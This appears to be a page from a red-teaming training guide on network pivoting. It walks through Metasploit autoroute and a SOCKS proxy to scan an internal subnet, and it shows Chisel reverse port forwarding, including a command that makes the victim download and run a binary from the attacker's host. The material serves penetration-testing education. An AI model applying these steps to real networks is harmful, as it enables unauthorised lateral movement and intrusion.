Pivoting & Tunneling

Pivoting is a technique used in penetration testing and cyber attacks where the attacker uses a compromised machine to move deeper into a network. By pivoting, an attacker can access different subnets that are not directly accessible from the attacker's original network. This allows the attacker to bypass network segmentation and access internal resources.

Introduction

Pivoting involves using a compromised host to relay traffic to other systems and subnets within the target network. This technique is essential for exploring network segments that are not directly accessible from the attacker's initial foothold. The compromised host acts as a bridge, forwarding traffic between the attacker and the internal targets.

Types of Pivoting

Network Pivoting (Layer 3):

  • Involves routing IP traffic through the compromised host to reach other network segments.

  • Utilizes routing and forwarding mechanisms.

Port Forwarding (Layer 4):

  • Involves forwarding specific ports from the attacker's machine to the target network through the compromised host.

  • Utilizes tools and techniques to forward traffic at the transport layer (TCP/UDP).

Application Layer Pivoting (Layer 7):

  • Involves tunneling application-specific traffic through the compromised host.

  • Utilizes proxies and application-level tunneling tools.

Tools Commonly Used for Pivoting

  • Metasploit Framework

  • Meterpreter

  • SSH (Secure Shell)

  • ProxyChains

  • SOCKS Proxy

  • Nmap

  • PowerShell Empire

  • Chisel

  • Plink (PuTTY Link)

  • Cobalt Strike

  • Impacket

  • FoxyProxy

  • MSFvenom

  • RDP (Remote Desktop Protocol)

  • Netcat

A real-world example of pivoting where an attacker, situated within the 192.168.x.x network segment, connects to and pivots into the internal network segment (lateral movement) using a second network interface card (NIC)

Pivoting to the Internal (different) subnet of the Victim Machine:

  1. It is assumed that we already compromised the host File02 and got the meterpreter reverse shell with low privs (bdc\paul) in MSF- ParrosOS (Attacker Machine):

  1. We could see the Internal 2nd NIC installed on the Victim System- File02 with the IP Address 172.16.69.4:

  1. Since our goal is to reach out to the Internal Segment (172.16.69.X) of the Victim, we need to change the Routing, this can be achieved by using MSF:

Background Session 2:

Use the below MSF module to enable the Autoroute:

use post/multi/manage/autoroute
set SUBNET 172.16.69.0 //It's the internal subnet of the target we want to compromise
set SESSION 2
run

  1. Route added successfully. To use external tools like Nmap, set up a system-wide proxy by using auxiliary/server/socks_proxy module. Change the default SRVPORT (i.e. 1080) to match the default port of proxychains i.e. 9050

Commands:

use auxiliary/server/socks_proxy
show options
set SRVPORT 9050
run

  1. Use netstat command to verify that the proxy is running:

netstat -tpln

  1. Scan the target machine using Nmap over proxychains. Remember, no configuration change is needed for proxychains to work because proxychains runs on port 9050 by default.

We got a success :)

proxychains nmap -sT -Pn 172.16.69.4 -v

We can see the open ports on File02 by scanning in to the different subnet (172.16.69.0/16):

Output of File01 (172.16.69.32):

Output of Backup_dc (BDC 172.16.69.70)- ADDC:

Please check/modify your proxychains config file before doing any activity:

nano /etc/proxychains4.conf

Extras:

We can also rdesktop to file01 (172.16.69.32);

Port Forwarding on Linux Machine without having ssh credentials

Port Forwarding using Chisel:

Chisel is a very useful tool comes handy while forwarding local port on the Linux Machine to the Attacker's machine.

The very good feature in this tool is that we DON'T require any credentials like ssh to do the same, just run Chisel as a Server on the Attacker Machine and then upload the same chisel executable on the Victim and run it as a Client in below way:

  1. On Attacker Machine (e.g. Parrot/Kali):

./chisel server -p 9999 --reverse

  1. On Target/Victim Machine:

wget http://10.10.14.9:8000/chisel
chmod +x chisel
./chisel client 10.10.14.9:9999 R:8010:127.0.0.1:8000  //Where Port 9999 is a listening port of the Chisel, running on the Attacker Machine (Parrot), 8000 is the port we want to forward (e.g. Application Lavarel is running on port 8000 (internal) on the Linux Victim Machine), 8010 is the new port on which the Lavarel program will be accessible in Attacker's Machine.

3 & 4: To access the newly forwarded port 8000 on Attacker Machine:

http://localhost:8010/

Conclusion

Pivoting within a network is a critical technique used by attackers to move laterally and gain access to additional network segments. By exploiting compromised hosts and leveraging tools and techniques such as Metasploit, SSH tunneling, and proxy chains, attackers can bypass network segmentation and access otherwise isolated systems. Understanding these methods is essential for penetration testers to simulate real-world attack scenarios and for defenders to implement effective countermeasures.

Effective network defense strategies should include robust network segmentation, continuous monitoring, strong access controls, and regular security assessments. By doing so, organizations can reduce the risk of lateral movement and improve their overall security posture. Ensuring that security measures are in place to detect and respond to pivoting activities is crucial for maintaining the integrity and confidentiality of critical network resources.

Nowadays, Endpoint Detection and Response (EDR) solutions are capable of detecting and preventing these types of attacks. However, advanced hacking techniques can still circumvent these defenses.

These sophisticated methods are an integral part of what we teach in our live Red Teaming sessions, enabling security professionals to stay ahead of the latest threats and enhance their defensive capabilities.

PreviousBackdoorsNextCloud in Red Teaming

Last updated